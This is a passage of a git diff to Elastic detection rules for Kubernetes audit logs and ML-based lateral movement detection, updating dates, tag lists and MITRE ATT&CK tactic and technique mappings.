"production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -40,6 +40,11 @@ kubernetes.audit.objectRef.resource == "pods" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index 19a1619b8ab..c3976832488 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,13 +57,7 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "ec81962e-4bc8-48e6-bfb0-545fc97d8f6a" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide" - ] +tags = ["Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -74,7 +68,12 @@ kubernetes.audit.stage == "ResponseComplete" and `kubernetes.audit.annotations.a [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml index b6fa7170cb4..b99c04c5b26 100644 --- a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml +++ b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,13 +55,7 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "4b77d382-b78e-4aae-85a0-8841b80e4fc4" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -74,11 +68,15 @@ user_agent.original:(* and not (*kubernetes/$Format)) [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml index 1dcd69850d3..9c6166c4479 100644 --- a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml +++ b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,14 +56,7 @@ Kubernetes orchestrates containerized applications, relying on API requests for risk_score = 21 rule_id = "8a1db198-da6f-4500-b985-7fe2457300af" severity = "low" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Domain: Container", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Container", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -79,11 +72,15 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["kubernetes.audit.annotations.authorization_k8s_io/decision", "kubernetes.audit.user.username", "user_agent.original"] diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml index a850dfd2023..c7d081ec603 100644 --- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml +++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,14 +67,7 @@ references = [ risk_score = 47 rule_id = "63c057cc-339a-11ed-a261-0242ac120002" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Initial Access", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -102,7 +95,6 @@ reference = "https://attack.mitre.org/techniques/T1078/001/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml index 229f671329b..803bf630a6a 100644 --- a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml +++ b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2025/06/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ references = [ risk_score = 47 rule_id = "65f9bccd-510b-40df-8263-334f03174fed" severity = "medium" -tags = ["Data Source: Kubernetes", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Tactic: Persistence", "Data Source: Kubernetes", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -91,14 +91,26 @@ event.dataset : "kubernetes.audit_logs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml index ec7881b3507..83338845d36 100644 --- a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml +++ b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/20" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,24 +85,24 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml index de40e62409d..b64d6a1d21f 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,24 +96,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml index 15f42caaf18..0161fff49b9 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,24 +101,24 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml index eebe0cdc29e..96772301c11 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml index ec7c7a3285f..253479e9a3c 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,24 +107,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml index f68d1d287ff..0ad2e174afe 100644 --- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml +++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml index 550d4cdd47e..157115d18dd 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ references = [ risk_score = 47 rule_id = "3c82bf84-5941-495b-ac41-0302f28e1a90" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -82,6 +75,19 @@ sequence by user.name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -93,9 +99,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -111,6 +117,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index cd55cbf8734..c4900f37adf 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,14 +53,7 @@ references = [ risk_score = 21 rule_id = "78c6559d-47a7-4f30-91fe-7e2e983206c2" severity = "low" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -75,38 +68,24 @@ not kubernetes.audit.user.groups:"system:masters" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1053.007" +name = "Container Orchestration Job" +reference = "https://attack.mitre.org/techniques/T1053/007/" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index 0314f867e2f..747bfb801fd 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,9 +89,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -107,6 +107,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index 6c59087b0b3..c482f279901 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,16 +93,24 @@ not kubernetes.audit.requestObject.spec.containers.image:( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.001" -name = "Default Accounts" -reference = "https://attack.mitre.org/techniques/T1078/001/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml index a2e6b2e13ee..8993db07aa2 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -51,13 +51,7 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Lateral Movement Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -95,14 +89,31 @@ Remote Desktop Protocol (RDP) facilitates remote access to systems, often target - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml index db8f0b280e8..9b7810b788f 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating adm - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml index b4d4e4a8ff6..2a44e9de8ee 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,13 @@ Machine learning models in security environments analyze file transfer patterns - Enhance monitoring and logging for unusual file transfer activities and remote access attempts to improve early detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml index bc0292876e8..cb00727c844 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating leg - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git 